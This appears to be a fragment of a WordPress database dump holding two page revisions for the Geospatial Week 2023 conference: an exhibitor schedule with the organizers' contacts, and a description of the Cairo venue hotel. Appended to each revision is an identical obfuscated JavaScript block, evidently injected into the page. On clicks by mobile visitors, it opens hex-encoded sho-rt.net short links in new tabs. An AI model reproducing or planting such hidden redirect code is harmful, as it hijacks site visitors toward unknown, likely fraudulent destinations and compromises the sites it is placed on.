Alexandria, </strong><strong>Miami </strong><strong>Campus</strong></p>\n<p><strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong></p>\n<p><strong>Tel :(+203) 5565429/ 5506042</strong></p>\n<p><b>Fax:(+203) 5487786/ 5506042  </b></p>\n<p>&nbsp;</p>\n<p><strong>Alexandria, </strong><strong>Abu kir Campus</strong></p>\n<p><strong>Tel :(+203) 5622366/ 5622388</strong></p>\n<p><b>Fax:(+203) 5610950</b>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\">\n<h5><strong>September 2</strong></h5>\n</td>\n<td width=\"189\">\n<h5><strong>9:00 – 5:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5><strong>Tutorial Day</strong></h5>\n<h5><strong>Exhibition Setup</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 3</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>12:00-17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition Opening</strong></h5>\n<h5><strong>Welcome Reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 4</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Exhibitors’ reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 5</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 15:00</strong></h5>\n<h5><strong>15:00 – 18:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Dismantle Exhibition</strong></h5>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></h5>\n<p>&nbsp;</p>\n<h5><strong>INFORMATION</strong></h5>\n<p><strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-01-28 23:25:35','2023-01-28 23:25:35','',2920,'https://gsw2023.com/?p=3656',0,'revision','',0),
(3657,1,'2023-01-28 23:36:22','2023-01-28 23:36:22','<p>[vc_row][vc_column][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<section class=\"clear\"><strong><a>GSW2023 will take place at the INTERCONTINENTAL CAIRO SEMIRAMIS </a></strong></section>\n<ul>\n<li style=\"text-align: justify;\">\n<h6><strong>On the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. The conference venue hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h6>\n</li>\n</ul>\n<div class=\"gap-10\"></div>\n<ul>\n<li><strong><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></strong></li>\n</ul>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2683\" img_size=\"850x516\"][vc_single_image image=\"2936\" img_size=\"1200x1200\"][/vc_column][/vc_row][vc_row][vc_column][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023 Venue','','inherit','closed','closed','','2679-revision-v1','','','2023-01-28 23:36:22','2023-01-28 23:36:22','',2679,'https://gsw2023.com/?p=3657',0,'revision','',0),
